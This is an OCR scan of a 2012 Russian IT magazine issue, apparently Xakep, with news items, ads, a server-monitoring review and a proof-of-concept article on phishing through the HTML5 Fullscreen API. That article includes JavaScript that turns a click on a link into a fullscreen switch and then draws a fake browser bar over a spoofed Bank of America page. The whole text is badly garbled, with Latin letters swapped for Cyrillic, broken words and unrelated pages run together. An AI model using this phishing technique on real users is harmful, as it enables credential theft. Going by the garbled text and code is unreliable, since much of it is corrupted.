гатРигг 

Нашел хороший способ 
избавиться от «необходимо- 
сти» в Неар 5ргау для прак- 
тически всех уязвимостей СІАР в ІЕ8. 
#МоМогеНеар5ргауз 



ІИ» 


ГакургігеІ 


5НА-3 анонсирован! Кессак 




выиграл. ѵѵѵѵѵѵ.пізСаоѵ/Ш/сзсІ/ 


5Ьа-100212.с^т ... 



ГЭзіскіресІіаЬоІ 

Хорошая подруга может сэконо- 
мить около 200 Гб места на жест- 
ком диске. 







• 


гадіатспіскеп 






Дальше по плану ^уас12, потом 
^2егоМідЬіз и ^дсИ Больше 


• 

ща5 


• 

я ту( 


® всего жду 2М, там будет настоя- 
:овка) 
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МЕ6АМЕѴѴ8 78% ВІТСОІН-ВАЛЮТЫ НАВЕЧНО ОСЕДАЕТ в КОШЕЛЬКАХ ЮЗЕРОВ и НЕ ИСПОЛЬЗУЕТСЯ, утверждают математики Дорит Рони АдиШамир. 



ОПЕРАТОР СВЯЗИ УПРОСТИЛ 
«РАБОТУ» МОШЕННИКАМ 



АБОНЕНТОВ МТС ПОДПИСЫВАЮТ НА ПЛАТНЫЕ УСЛУГИ БЕЗ ИХ ВЕДОМА 

□ Сети обнаружилась«партнерская сетьсайтов» РЬопеСІіск, создан- 
ная теми же людьми, что некогда занимались мошеннической сетью 
ЛпСопѵегС РЬопеСІіскне многим отличается от своей предшествен- 
ницы, хотя сточки зрения закона все легально. Схема работы такова: сайты 
РЬопеСІіскподелены по категориям (анекдоты, погода, софт для мобильных 
и так дал ее). На самом деле весь этот контент, конечно, не является премиаль- 
ным, а то и вовсе представляет собой обыкновенный фей к. 

Когда абонент МТС (схема работаеттолько для данного оператора) заходит 
на один из этих сайтов с мобильного устройства, система по ІР-адресу автома- 
тически определяет его номер телефона и предлагает подключиться к платной 
подписке стоимостью 20 рублей вдень. Разумеется, предупреждение отом, что 
контент платный, написано внизу страницы мелким шрифтом под цвет фона. 

В явном виде предлагается просто оформить подписку для доступа к содержа- 
нию сайта. О факте платной подписки пользователя информируют по 5М5 розі 
^асіит. Почему именно МТС? Потому что МТС внедрила технологию М5І50М 
(МоЬіІе Віаііоп Іпіедгаіесі Зегѵісез Оідііаі МиітіЬег), позволяющую сторонним 
сайтам определять номера сотовых абонентов и автоматически активизи- 
ровать им платные подписки. С абонентами других операторов процесс идет 
заметно сложнее: там пользователь должен сам ввести свой номер телефона, 
азатемещеи код из полученного5М5. 



Приветствуем Вас 



ЁИДЁО уроки 



Доступные страны 

ж (ЧЖН 



||« 



РНопеСІіск 







Піэддермкй 






Какнистранно, 
оператор продол- 
жаетсчитать, что 
М5І50М— это удобно 
и безопасно. «Або- 
нентупередпод- 
пиской выводится 
Іапсііпдрадесинфор- 
мациейостоимости 
услуги и ссылкой 
на оферту партнеру, 
поэтомуназывать 
это мошенничеством 
нельзя», — коммен- 
тирует пресс-служба 
МТС. 




НОВЫЙ СНРОМЕВООК 
ОТ5АМ5ОМ0 

ЖИЗНЬВ МИРЕ ВЕБ-ПРИЛОЖЕНИЙ 
И КОНТЕКСТНОЙ РЕКЛАМЫ 

оодІеанонсировалаВаппзипд СЬготеЬоок, кото- 
рый, помнениюпредставителей компании, должен 
статьхорошим кандидатом на рольдополнительно- 
гоустройствавдоме или ноутбука для учащихся. Принимая 
во внимание, что цена устройства составляет всего 249 
долларов, свою целевуюаудиториюноутбукопределенно 
найдет. Новинка базируется на АРМ-чипе Ехупоз 5 ОиаІ, 
основанном на новой архитектуре Сог1ех-А15. Крометого, 
СЬготеЬоок обладает 11,6-дюймовым дисплеем (1366x768), 
16 Гбпамяти, 2 Гб оперативной памяти и ВІиеІооіЬ. К ин- 
тернету можно подключиться только через ѴѴі-Рі. Время 
работы устройства, какутверждается, составляетшесть 
с половиной часов. Хотя ноутбук максимально ориентирован 
на низкую цену, боодіеутверждает, что он способен вос- 
производить 1080р-видео при частотеЗО кадров в секунду. 
Новый СЬготеЬооктакже получился куда компактнее пред- 
шественников — он весит 1,13 кг, а его толщина — 2,03 см. 

Но конечно, главным плюсом или минусомздесьвы- 
ступаетсама СЬготе 05, облачная операционка, по сути 
созданная для работы одного приложения — браузера 
СЬготе. Отзывы о ней до сих пор разнятся, и некоторые 
обозреватели в шутку пишут о ней: «порой мне кажется, что 
яживу внутри рекламы Ооодіе». 





ЯЩИКИ ^^ОФИЦИАЛЬНОЙ 
ЭЛЕКТРОННОЙ почтьь^ 

которую планируют в скором 
будущем запустить в России, 
будутпривязаныкфизиче- 
скому домашнему адресу 
пользователя. 



ЗАДВЕ С ПОЛОВИНОЙ НЕДЕ- 
ЛИ ХАКЕР И ЕГО ПОДЕЛЬНИК 

вывели со счетов клиентов 
системы электронных плате- 
жей ЗАО «ОСИП» 2,3 милли- 
она рублей. Мошенники уже 
арестованы. 



ВИНТЕРВЬЮ 
ТОЯЯЕНТРЯЕАККИМДО- 
ТКОМ ПРИЗНАЛСЯ, чтознал 
о прослушке со стороны 
властейдавно— у него на- 
чались необъяснимые лаги 
влюбимомСаІІо^ОиІу. 



ХАКЕРРІНКІЕРІЕНАШЕЛ 
ЕЩЕ ОДНУ КРИТИЧЕСКУЮ 
«ДЫРКУ>^ В СНЯОМЕ, зара- 
ботав еще 60 тысяч долларов 
по программе вознагражде- 
ния. Пареньтак миллионером 
станет:). 



ПОДАННЫМ<<ЛАБОРАТО- 
РИИ КАСПЕРСКОГО>^ 23,2% 
вредоносныххостингов 
втретьем квартале 2012 года 
были расположены в РФ— 
увы, Россия вышла в мировые 
лидеры. 
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НЕВСЕЕЗИНЫ 
ОДИНАКОВО ПОЛЕЗНЫ 

ДЕТИ, ЧИТАЙТЕ ХОРОШУЮ ІТ-ПРЕССУ! 

омичная история приключилась с редакторами польского 
езина (электронного журнала) Накіп9. Это издание суще- 
ствуетс2005 года, выходитраз в неделю и специализиру- 
ется на информационной безопасности. В Накіп9 публикуются ма- 
териалы на английском, немецком и французском языках. Но самое 
забавноезаключается втом, что журнал платный. 

Редакция езина, видимо, ребята очень упорные — им отчаянно 
хотелось видеть на страницах своего детища как можно больше 
статей, написанныхнастоящими и крутыми специалистами в об- 
ласти ИБ. Издателитакстарательно и нудноупрашивали различных 
безопасников написать материал-другой (разумеется, совершенно 
бесплатно) для Накіп9, чтоутехзакончилосьтерпение. Джон Обер- 
хейде, МаркДауд и еще ряд известных специалистов скоопериро- 
вались и написали фейковое и, в общем -то, откровенно издеватель- 
ское руководство к некоему ОАРРАІпІ'егепсе СЬекіпд КІибде Бсаппег 
(0ІСК5) — расширению сканера Мптіар. Статья даже при беглом 
прочтении напоминает бред сумасшедшего и вызывает нездоровый 
смех, но это не остановило редакцию езина! Статью опубликовали 
на страницах платного (!) электронного журнала в следующем же 
номере. Авторы статьи определенно поймали множество лул зов 
и тутже выложили свой «шедевр» в открытый доступ. 

Чтобы ты оценил всю прелесть, заметим, что в статью, например, 
включена А5СІІ -картинка 8====>, наукообразные диаграммы, вроде 
зависимости производительности Мптіар от графика популярности 
ІРѵ7, и схема «психоакустическогохранилища»! В итоге над редак- 
цией Накіп9 посмеялисьуже даже в рассылке Мппар ОеѵеІортепС 





Г5Е? 2^ I 

іИаніп0 

ріислсм. ряотктюм наяооокітксипѵі." - 



Еслиутебя неплохо 
санглийским, со- 
ветуем сходить 
поссылкеипрочи- 
тать «руководство» 
полностью — от- 
лично поднимаетна- 
строение ( птар.огд/ 
тІ5с/Ьакіп9-птар- 
еЬоок-сЫ.рсіП . 



ТРЕЫОМІСРООПУБЛИКОВАЛАОТЧЕТО КИБЕРУГРОЗАХ: 



ЮЗЕРОВ АМОВОІО СТАЛИ 
НА 483% ЧАЩЕ АТАКОВАТЬ 
С ИСПОЛЬЗОВАНИЕМ 
МАЛВАРИ И РЕКЛАМНОГО 
ПО (175 ТЫСЯЧ АТАК 
ВСЕНТЯБРЕІ 



ЕОІРІЕР® 

ІПТИМАЛЬНЫИ 

ВЬБОП 






НС52330 (С2 РШ5) 



Т 



.УЧ. 



• Двухполосные деревянные сателлиты 
и мощный 6,5" сабвуфер 

• Возможность одновременного 

подключения 2-х источников звука 

• Удобное расположение органов 
управления на внешнем усилителе 

• Беспроводной пульт ДУ 

• Система автоматической компенсации 
искажений — Ебібег ІпсеШдепс 
ОІБСоПііоп СопСгоІ 

^ 



«Кристальный звук»: 
Сравнительное тестирование 
Активной аккустики 2. 7 
Зима/201 1 

«ЕОІПЕР НС52330 ПРЕДСТАВ- 
ЛЯЕТСЯ НАИБОЛЕЕ СБАЛАНСИ- 
РОВАННЫМ 2.1 -НАБОРОМ» 








Ж' 






РЕКОМЕНДУЕТ: 

«НС52330 - ОПТИМАЛЬНЫЙ 
ВЫБОР ДЛЯ ГЕЙМЕРОВ» 



11/2012 
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МЕ6АМЕѴѴ5 



БОЛЕЕ 500 МИЛЛИОНОВ мобильныхустройств на платформе боодіе Апсігоісі активировано по всему миру, сообщил Ларри Пейдж. 



АНОНИМУС 

РАССОРИЛСЯ С ѴѴІКІІЕАК5 



ФАЙЛОВАЯ СИСТЕМА Е2Е5 

НОВАЯ СИСТЕМА ДЛЯ Р1А5Н-НАК0ПИТЕЛ ЕЙ 



ХАКТИВИСТЫ НЕДОВОЛЬНЫ ПОЛИТИКОЙ ѴѴІКІІЕАК5 




27сентября2012 
годаСШАпризнали 
Джулиана Ассанжа 
врагом государства, 
так что созда- 
тельѴУікіІеакз 
по-прежнему 
живети работает 
натерритории по- 
сольства Эквадора 
вЛондоне,неимея 
возможности даже 
перебазироваться 
всамЭквадор. 



азалосьбы, Анонимусдолжен всячески поддерживать 
проект ѴѴікіІеакз и его опальногосоздателя Джулиана Ас- 
санжа, всежеѴѴікіІеакз во многом перекликается с идеями 
«легиона». Так все и обстояло до недавнего времени, но, похоже, 
теперьАссанжи Анонимы больше не друзья. Яблоком раздора стал... 
рекламный баннер. 

Недавно проект ѴѴікіІеакз ввел «платный доступ» к разделу, где 
выложены наиболее важные документы, в том числе З^га^ог, СІРіІез, 
сирийские письма. Утверждается, что некоторые из этих документов 
«слили» именно Анонимы. Пока доступ к разделу не перекрыли со- 
всем — при попытке открыть страницу появлялся большой красный 
баннер с просьбой о пожертвованиях, он не исчезал до тех пор, пока 
не сделаешь пожертвование или не отключишь ^аѵа5сгір^ (а люди 
ещежаловалисьна ѴѴікіребіа и ДжиммиУэйлса). Создатели проекта 
уверяют, что прибегнуть к та КИМ ухищрениям их вынудили исключи- 
тельно большие издержки в военных судах. 

Анонимовэтонесмягчило. Они выложили на РазІеЬіп обра- 
щение, в котором утверждают, что ѴѴікіІеакз превратился в«шоу 
одногоактера» и используется исключительно для пиара Джулиана 
Ассанжа. Нет, Анонимы по-прежнему не считают Ассанжа пре- 
ступником, но основная за дача ѴѴікіІеакз — публиковать секреты 
корпораций и правительств, а не писать про тяготы жизни Ассанжа 
в посольстве Эквадора. 




нженеры компании Эаппзипд представили набор патчей 
с реализацией новой файловой системы Р2Р5 (РІазЬ- 
РгіепсІІу Рііе Эузіеіті), которая была разработана специ- 
ально для накопителей, использующих МАМ О РІазЬ (550 -, еММС- 
и 50 -карты). Под это определение сегодня подпадают множество 
устройств, от мобильных телефонов до серверов. 

Р2Р5 была представлена в списке рассылки для разработчиков 
ядра Ііпих, где и был опубликован патч, а также первый релиз па- 
кета І'21'з-Іооіз, содержащего коллекциюутилитдля обслуживания 
разделов Р2Р5 (в который входит пока только тк1'з.і'2і'з для форма- 
тирования разделов). Код всех составных частей распространяет- 
ся в рамках лицензии СРІѵ2. 

Создатели Р2Р5 постарались превзойти всех предшествен- 
ников. Р2Р5 работает через РТІ (интерфейс управления флеш- 
памятью на микросхеме), поддерживает разные алгоритмы 
для размещения файлов и разные алгоритмы очистки. Файло- 
вая система для работы с МАМ О должна максимально бережно 
обращаться с носителем, равномерно распределяя нагрузку. 
Журнально-структурированная (Іод-зігисіигесі) файловая система 
предполагает, что все данныезаписываются последовательно 
и никогда не перезаписываются. Для очистки отстарого «мусора» 
используется отдельная процедура. Ноу МАМО-микросхем есть 
ограничение на количество циклов записи -считывания. В этом 
принципиальное отличие от журналируемых файловых систем, 
которые не слишком подходятдля работы с флеш-памятью. 



Предыдущая журнально-структуриро- 
ванная файловая система ІодРЗ сучетом 
особенностей флеш-памяти была пред- 
ставлена 16 мая 2010 года и включена 
в ядро Ыпих 2.6.34. До ІодРЗ были 
ІІЬіРЗ и УаМз2. Р2РЗ предназначена 
для использования в АпсІгоісІ- 
смартфонах, но ничто не мешает 
использовать Р2РЗ на десктопе 
илисервере. 





МУЗЫКАЛЬНАЯ КОЛЛЕКЦИЯ 
СРЕДНЕГО АМЕРИКАНЦА 
18-29ЛЕТ состоит из 1867 
файлов, из которых406 ска- 
чаны бесплатно из интернета, 
417 скопированы у друзей, 
а345«рипнуты»сС0.Ктаким 
выводам пришли исследова- 
тели из Атегісап АззетЫу. 
Однако чем больше в коллек- 
ции файлов, полученныхне- 
легальным путем, тем больше 
у человека лицензионного 
контента. Воттакой парадокс. 




ПОЯВИЛСЯ НОВЫЙ ТУЛКИТ 

НзокпоргоЫетЬго, который 
позволяет проводить 
мощнейшие ООоБ-атаки 
до 70 Гбит/с и более 30 мил- 
лионов ррз, предупреждают 
эксперты. 



МНОГО НОВОСТЕЙ 
0ЯА5РВЕЯЯѴРІ — объем 
оперативной памяти вырос 
до 512 Мб, проц можно разго- 
нятьдоі ГГц,а вот габариты 
мини-компьютера и цена 
«не пострадали». 
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ВЫШЛА ивиМТи 12.10. Шаттлвортзаявил о переходе на полузакрытый режим разработки, но потом срочно опроверг свои же слова 



ЯБЛОЧНЫЙ ДАЙДЖЕСТ 

ПРЕДСТАВЛЕНЫ ІРАО МІМІ, МАСВООКРРО РЕТІМАИ ІРА 04 

□ прошлом номере мы не могли оставить без внимания выход 
пятого іРЬопе, которого такждали многие гики планеты, 
а сегодня не можем пройти мимо еще одной презентации 
Арріе, принесшей сразу ряд новинок. 

Самым ожидаемым новым продуктом стал іРасІ тіпі, чье по- 
явление не было секретом — о нем знали заранее. Как нетрудно по- 
нять из названия, ІРасІ тіпі практически копирует привычный нам 
ІРасІ почти во всем, не считая габаритов: новинка комплектуется 
экраном 7,9 дюйма в отличие от своего «старшего брата» с диспле- 
ем 9,7 дюйма. Разрешение дисплея составляет 1024 на 768 точек, 
в точности каку ІРасІ 2 (правда, за счет меньшего размера экрана 
плотность пиксел ей у ІРасІ тіпі выше — 163 штуки на дюйм). Также 
планшет может похвастаться рекордно малой толщиной — всего 
7,2 мм. Кроха базируется на Арріе А5, имеет фронтальную и заднюю 
камеры и оснащается разъемом ЫдЫпіпд. Арріе пошл а привычным 
путем и выпускаетновинку в двух вариантах: с поддержкой со- 
товых сетей и ѴѴі-Рі или исключительное поддержкой ѴѴі-Рі. Цена 
первой модификации будетсоставлять459, второй — 329 долларов. 

Однако ІРасІ Міпі стал не единственным новым продуктом 
линейки, показанным на презентации. Арріе неожиданно анон- 
сировала ІРасІ четвертого поколения, который, напротив, никак 
не изменился внешне, зато обзавелся более мощным железом. 
Теперь «под капотом» планшета скрывается процессор А6Х, а про- 
изводительность графической системы выросла вдвое. Получил 
обновленный ІРасІ и разъем ЫдЫпіпд, скоростной ѴѴі-Рі и уже обыч- 
ную поддержку сетей ІТЕ (которая нежелаетработатьв России). 





В дополнение к перечисленному Арріе представила публи- 
ке МасВоок Рго с 13 -дюймовым экраном Реііпа. Помимо нового 
экрана, в ноутбуке заметны определенные изменения: к при- 
меру, теперь он весит 1,5 кг и стал в полтора раза тоньше (1,9 см). 
Устройство базируется на Соге І5 или І7 и графике Іпіеі НО бгарЫсз 
4000. Наличествуют слот для карты памяти, 05В 3.0, МадВаі'е 2, 
ТЬипсІегЬоІЦ выход НОМ I, камера высокого разрешения, два микро- 
фона, стереоколонки и 8 Гб оперативной памяти. ОѴО -при вода нет. 
Цена обновленного МасВоок составит 1700 долларов. Но и на этом 
новинки не кончились! 

Если почти все перечисленные в нашем обзореустройства 
практически ни для кого не стали сюрпризом (информация о них 
давно утекла в Сеть и прессу, не считая разве что іРасІ четвертого 
поколения), то представление обновленного іМас все-таки сумело 
удивить многих. Моноблок тоже значительно «похудел»: тол щи на 
по краям теперь составляет л ишь 5 мм. іМас выйдет в двух вариан- 
тах — с 21,5 -дюймовым (разрешение 1920 х 1080) и 27-дюймовым 
(разрешение 2560 х 1440) экраном. На борту новинки, как пола- 
гается, Іпіеі Соге І5 либо Соге І7, графика МѴЮІАСеРогсе, НО- 
камера, стереозвук, объем памяти для хранения данных до 3 Тб. 
ОѴО-привода теперь нети здесь. Также стоит отметить накопитель 
Ризіоп Огіѵе смешанного типа, который объединяет в себе сразу 
жесткий диск на 1-3 Тб и 50 О -диск на 128 Гб. Быстрый 550-раздел 
будет использоваться для хранения данных ОС. Продажи стартуют 
в ноябре-декабре, младшая модель обойдется в 1299, старшая — 
в 1799 долларов. 




ПОДОБНО АРРІЕ, МІСР050РТ 
СОБИРАЕТСЯ ВЫПУСКАТЬ СОБСТВЕННЫЕ 
УСТРОЙСТВА, ПО И СЕРВИСЫ, 

ФОРМИРУЯ ЕДИНУЮ ЭКОСИСТЕМУ 



МІСРОЗОРТОБЪЯВИЛАОКАРДИНАЛЬНОЙСМЕНЕСТРАТЕГИИ 
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с ІС АВУ ТЕ 





Сделай проще 
ИТ менеджмент в офисе и дома 



Системные платы (ЫСАВУТЕ В75 серии 



ШгаОшаі^' 



Зиррогг 
ІшеІ 5таІІ 
Ви5Іпе55 
Асіѵапгаде 








ІПІВІ® ЗтаІІ Визіпезз АсІѵапСаде Составляющие успеха 



Іпів!® ЗтаІІ Визіпеаа Асіѵапівде программный комплекс 
в составе 6 фирменных приложений: 



Безопасность 





Программный мониторинг 

с помощью программного мониторинга можно контролировать установленное на компьютере 
ПО, и пресекать активность вредоносных программ. В состав комплекса входит программное 
обеспечение компаний МісгозоЙ, Зутапіес, КІпдзоЙ, Тгелсі Місго, МсА^ее и Казрегзку. Монито- 
ринг ПК и блокировка атак извне осуществляются в реальном времени. 




Резервное копирование и восстановление данных 

Утилита Оаіа Васкир апсі Кезіоге обеспечивает резервное копирование критичной информации 
по расписанию. С помощью утилиты можно вывести ПК из режима сна и инициализировать про- 
цедуру резервного копирования встроенными средствами ОС МісгозоА Васкир апсІ Резіоге. 




Функция иЗВ ВІОСКЕР2 

Функция ивв ВІоскег позволяет заблокировать или разрешить доступ к ПК в отношении определенного 
ивВ-устройства. После процедуры идентификации, средствами утилиты УЗ В ВІоскег 2 можно выбрать 
требуемую политику безопасности для подключаемой к компьютеру УЗВ-периферии. 



Продуктивная работа 




Утилита РС НЕАІТН СЕNТЕР1 

Утилита РС НеаІФ Сепіег позволяет владельцу ПК оперативно отслеживать выполнение всех 
неотложных задач, включая загрузку обновлений для ОС ѴѴілсІоѵѵз, дефрагментацию диска, уда- 
ление временных файлов после инсталляции ПО или сессий серфинга в Интернет. Выполнение 
конкретной задачи может начинаться сразу после загрузки ОС, даже, если перед этим компью- 
тер был выключен. 




Функции энергосбережения 

Приложение Епегду Заѵег дает возможность пользователю выбрать подходящую схему энер- 
госбережения, согласно которой ПК по завершении рабочего дня самостоятельно перейдет в 
спящий режим. Компьютеры могут быть приведены в рабочее состояние утром в указанное вре- 
мя, когда служащие приходят на работу. Выбрав приемлемый режим работы для ПК в течение 
дня или рабочей недели, в дальнейшем контроля со стороны пользователя уже не потребуется. 




Технология ІпФІ ѴѴІВЕІЕЗЗ 05Р1АУ* 

Это приложение дает возможность пользователям обмениваться цифровым контентом сред- 
ствами беспроводных технологий, проецируя изображение на специализированный широкофор- 
матный дисплей. Приложение будет доступно только в том случае, если на ПК под управлением 
ОС ѴѴілсІоѵѵз 7 будет установлен соответствующий виджет Іпіеі® ѴѴіОІ. 
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л инноваииоиных л 
д технологий ^ 
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Бесплатно можно мониторить до пяти серверов 



ПРО МОНИТОРИНГ СЕРВЕРА 



К ЧЕМУ ПРИВОДИТ ЛЕНЬ 

Хочу поделиться с тобой настоящей находкой. 
Не так давно я познакомился с инструментом, 
который теперь использую ежедневно. Я го- 
ворю о сервисе мониторинга Меѵѵ Реііс. Мне 
не раз про него рассказывали, но, по правде 
говоря, каждый раз я пропускал это мимо 
ушей, потому что сложный мониторинг мне 
никогда нужен не был. 

Некоторое время назад передо мной 
встала задача разобраться с медленным 
веб-приложением — развернутое на пяти 
серверах, оно умудрялось тормозить даже 
при небольшой нагрузке. Конечно, можно было 
проверить один сервер за другим, изучить 
логи пдіпх'а, посмотреть на работу баз данных, 
но мне, говоря откровенно, было очень лениво. 
Хотелось получить общую картину максималь- 
но быстро и с минимумом геморроя. И воттут 
я вспомнил про Меѵѵ Реііс [ пеѵѵгеііс.сот ]. 

БЫСТРЫЙ СТАРТ МЕѴѴ РеПГ 

Идея этого сервиса очень простая. На каждом 
из хостов устанавливается специальный агент 
(есть версии для ѴѴіпсІоѵѵз и Ыпих), который на- 
чинает собирать статистику об операционной 
системе, веб-приложении, используемой базе 
данных и так далее. Затем агент отправляет 
эти данные на сервер-коллектор, где они 
аккумулируются и превращаются в понятные 
таблицы и графики в веб-интерфейсе адми- 
нистратора. Надо отдать должное разработ- 
чикам: такой агентустанавливается в системе 
в два счета, и единственное, что необходимо 
указать после запуска инсталлятора, — это 
твой идентификатор. С его помощью Меѵѵ Реііс 
будет понимать, что данные пришли оттебя. 



БРАВО, МЕѴѴРЕЫС 

Уверен, что сценарии применения в каждом 
случае разные. Мне Меѵѵ Реііс нужен был 
не столько как инструмент для мониторинга, 
сколько для того, чтобы быстро найти «гор- 
лышко бутылки», из-за которого все тормозит. 
Самый важный параметр, вокруг которого 
все крутится, — это время ответа сервера. 

И я тут же получил четкую картинку: сколько 
из этих секунд ответа (это очень много) ушло 
на работу веб-сервера и РНР (в моем случае 
приложение было написано на нем) и сколько 
на работу базы данных. График прямо говорил, 
что проблема, скорее всего, завязана на базе 
данных. И тут я начал аплодировать разработ- 
чикам — сервис сразу же вывел список всех 
самых «дорогих» запросов к базе данных, 
выдав с потрохами тот самый, из-за которого 
все подвисало. Я упростил 501-запрос, создал 
дополнительный индекс — и проблема была 
решена! 

ЧТО можно МОНИТОРИТЬ? 

Пользуясь случаем, я решил посмотреть, 
что еще можно мониторить. Сервис боль- 
шое внимание уделяет не только времени 
ответа сервера, но и тому времени, кото- 
рое потребуется на обработку страницы 
на стороне клиента, то есть сколько времени 
ушло у браузера, чтобы отрендерить 
страницу. Тут же показывается и другая 
полезная статистика, например количество 
ошибок, которые были отданы пользователю. 
Естественно, для получения данных необхо- 
димо установить дополнительный агент, 
в зависимости оттого, какая технология 
лежит в основе веб-приложения. Агенты 



существуют для .МЕТ, РиЬу, РуіЬоп и, конечно 
же, РНР. Причем разработчики постарались 
свести настройку к минимуму: под ОеЬіап/ 
СІЬипІи все элементарно устанавливается 
через арі-деі без какой-либо возни 
с конфигурационными файлами. 

Помимо обследования веб-приложения, 
очень здорово реализован мониторинг 
самих серверов. Теперь я постоянно собираю 
статистику по всем серверам, в том числе 
их конфигурацию, тонкую статистику по СРІІ 
(включая 10 ѵѵаіі) и оперативной памяти, 
информацию о загрузке канала, данные 
по жестким дискам, а также другие полезные 
метрики вроде количества передаваемых 
пакетов в секунду. Для каждого сервера 
приводится и текущая информация по за- 
пущенным процессам: отныне не нужно 
коннектиться по 55Н и получать эти данные 
вручную. 

ПЛАТНО-БЕСПЛАТНО 

Надо сказать, что Меѵѵ Реііс — это бесплат- 
ный и одновременно очень дорогой сервис! 

В течение 14 дней ты можешь использовать 
все его возможности и, как в моем случае, 
найти много узких мест в архитектуре веб- 
приложения, выявив причины тормозов. 
Позже придется выкладывать минимум 
24 доллара в месяц за мониторинг каждого 
сервера, что, безусловно, довольно много. 

Но что приятно — есть бесплатный тариф- 
ный план, который хоть и не предоставляет 
кучи классных возможностей, но разрешает 
мониторить до пяти серверов и получать 
базовые (и самые важные) параметры работы 
веб-приложения. 
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Анатолий Ализар (аіііагйдтаіі.сот) 



; Ргооі'-оІ'-СопсерІ: ^ 

РИСУЕМ ФАЛЬШИВЫЙ БРАУЗЕР: 

ФИШИНГ ЧЕРЕЗ НТМС5 РЦИЗСКЕЕН АРІ 



В ЧЕМ ИДЕЯ 

Для классической фишинговой атаки обычно делается копия сайта 
банка, социальной сети, известной компании и регистрируется 
ІІРІ, похожий на настоящий. Например, тісгОзоЙ.сопп. Слабое 
место фишинга именно неправильный СІРІ. Пользователь всегда 
может посмотреть на адресную строку браузера и убедиться, что 
там указан неверный адрес. 

Идея фишинга через НТМ15 РиІІзсгееп АРІ заключается в том, 
что браузер пользователя переключается в полноэкранный режим 
и заменяет реальный интерфейс браузера предзагруженной кар- 
тинкой с изображением интерфейса браузера. При этом в «адрес- 
ной строке» можно указать любое называние сайта и нарисовать 
значок защищенного соединения — это ведь не настоящая адрес- 
ная строка, а просто картинка с текстовым полем. 

Идея не нова. Аналогичные фишинговые велись десять лет назад 
в браузере Іпіегпеі Ехріогег через полноэкранные всплывающие 
окна. Уязвимость была исправлена в 2004 году с выходом ѴѴіпсІоѵѵз 
ХР 5Р2 (Ыиу/ІгРууще). 

ТЕОРЕТИЧЕСКАЯ БАЗА 

Спецификации НТМ15 РиІІзсгееп АРІ позволяют инициировать пе- 
реход браузера в полноэкранный режим. Это делается простым ко- 
дом на веб-странице: еІетепіТоМакеРиІІзсгееп.гериезіРиІІЗсгеепО;. 
Главное ограничение, которое накладывают АРІ на разработчи- 
ка, — полноэкранный режим вызывается только в результате дей- 
ствия пользователя: нажатия клавиши на клавиатуре или кнопки 
мыши. Так что сайт не может просто загрузиться в полноэкранном 
режиме с самого начала. Поэтому вызов полноэкранного режима 
по щелчку мыши выглядит примерно так: 

$('#-Ри1І5 сгееп-Ьи1:1:оп'’) .оп ГсИск'. -Рипс1:іоп() { 

ѵаг сі ос = сіосишепі: . сІос ишепІіЕІетепІ: ; 

і-р (сіо с. гедие5І:Ри1 1$сгееп') сіос . гедиезІіРиІІ ЗсгеепП ; 

11 ; ^ 



еѵеп1:.5І:орРгора^а1:іоп П : 

// Вызываем полноэкранный режим 

(е1етеп1;Рго1;о1;уре. герие5І;Ри1І5сгееп) { 

сіосишепі:. сІосишепІіЕІепіепІ:. гедие5І:Ри1І5сгеепП ; 

} еізе і-Р (е 1ешеп1:Рго1:о1:уре.ыеЫ<і1:Кедие5І:Ри115сгееп') { 

сіоси шеп і: . сіоси шепі: Еіешепі: . ыеЬкНіКедиезІіРиІІБсгееп 

(Е1ешеп1:.АІШ 1лІ_КЕУВОАКР_ІІМРиП ; 

} еізе ІТ (е1ешеп 1:Рго1:о1:уре.шо2Кедие5І:Ри115сгееп') 

сіосишепі:. сіосишепі: Еіешепі:. шо2Кедие5І:Ри11$сгееп О : 

} еізе { // Таіі 5І1еп1:1ѵ } 

// Показываем фальшивый интерфейс и фишинговый сайт 

$('# ше п и. #Ьгоы5ег ' ') . зІіоыО : 

$Г#1:аг^е1:- 5І1:е') . зІіоыП ; 

Н! 

Фишинговая страница распознаёт браузер и ОС жертвы и под- 
совывает ему соответствующее изображение. В верхней части 
страницы отрисовывается интерфейс браузера с указанием СІРР 
настоящего сайта и со значком защищенного соединения. Как уже 
говорилось, средства НТМР5 позволяют даже использовать эту 
картинку как настоящую адресную строку. 

Студент Стэнфордского университета Феросс Абухадижи создал 
демонстрацию с поддельным сайтом Вапк о1 Атегіса: ЬіІ.Іѵ/ОРѴѵІд . 
Автор отрисовал интерфейсы браузеров СЬготе, Рігеіох и Ваіагі. 
Код демки: Ьі1.Іѵ/Ѵ11аВ2 . 

Естественно, все это сработает только при условии, что у поль- 
зователя не задействован специфический скин в браузере или 
куча дополнительных панелей — это сымитировать не получится. 
Но даже в таком случае многие ли удивятся неожиданным измене- 
ниям в интерфейсе? Многие ли напрягутся от внезапного сообще- 
ния браузера о переходе в полноэкранный режим? Мне кажется, 
от силы процентов десять. С другой стороны, подобные метамор- 
фозы намного заметнее, чем лишний нолик в адресе странички. ^ 



На практике нужно обращение к функциям то^РедиезіРиІІВсгеепО 
и ѵѵеЬкііРедиезіРиІІВсгеепО. Поскольку спецификации НТМР5 
РиІІзсгееп АРІ еще не утверждены, эти функции в браузерах на движ- 
ках Мо 2 ІІІа и ѴѴеЬКіІ снабжены соответствующими префиксами. 

КАК ПРОИСХОДИТ АТАКА 

Атака начинается с того, что пользователю на веб-странице по- 
казывают ссылку такого вида: «Зайди на сайт <а Ьге1="Ыірз://ѵѵѵѵѵѵ. 
Ьапко1атегіса.сопп"> Вапк о1 Атегіса</а> и получи 100 долларов». 
ІІРР выглядит нормально. Если навести курсор на эту ссылку, то 
в статусной строке браузера отразится адрес настоящего сайта. 

Но при нажатии происходит вызов события еѵепІ.ргеѵепЮеІаиІіО, 
которое предотвращает стандартное поведение браузера, а вместо 
этого использует нажатие пользователя по ссылке как триггер 
для вызова полноэкранного режима. 






1 'к'оаі'Шід ашм ІІ хпжк Е а* Ц-шм п іВс) 1 



ВапкбІАтегіЁЯ 




$('Іі1:ш1') .оп('с1іск кеургезз'^ 'а'^ (еѵепі:) { 

еѵепі: . ргеѵеп1:Ое-Раи11:() ; 



Фишинговый сайт Вапк о1 Атегіса в полноэкранном режиме 
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Илья Илембитов (іІетЬііоѵйгеаІ. хакер. ги) 




ЧЕМ 

ПОРАДОВАТЬ ГИКА? 



6А5М 



ЛУЧШИЕ ПОДАРКИ 
. 2012 ГОДА , 



Если ты читаешь это, на дворе уже декабрь и до праздников осталось совсем немного. Редакция 
][ наморщила умы (просто представь нескольких Томми Ли Джонсов в одной комнате) и придумала 
список самых удачных гаджетов и аксессуаров уходящего года, которыми можно было бы приятно 
(иногда даже слишком) удивить любого ІТ-шника. Все устройства в этом списке можно достать 
в России или в одном из популярных интернет-магазинов, и все они поставляются 
